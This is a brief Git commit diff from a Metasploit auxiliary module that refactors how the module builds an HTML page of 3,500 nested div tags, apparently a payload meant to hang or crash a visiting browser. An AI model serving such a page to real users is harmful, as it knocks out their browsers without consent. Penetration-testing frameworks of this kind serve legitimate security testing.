improve div tags
parent
2eb97ea07b
commit
1d2519978d
|
@ -50,10 +50,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
</style>
|
</style>
|
||||||
</head>
|
</head>
|
||||||
<body>
|
<body>
|
||||||
|
|
#{'<div>' * 3500 + '</div>' * 3500}
|
||||||
html += "<div>" * 3500
|
|
||||||
html += "</div>" * 3500
|
|
||||||
html += %|
|
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
|
|
||||||
|
|
Loading…
Reference in New Issue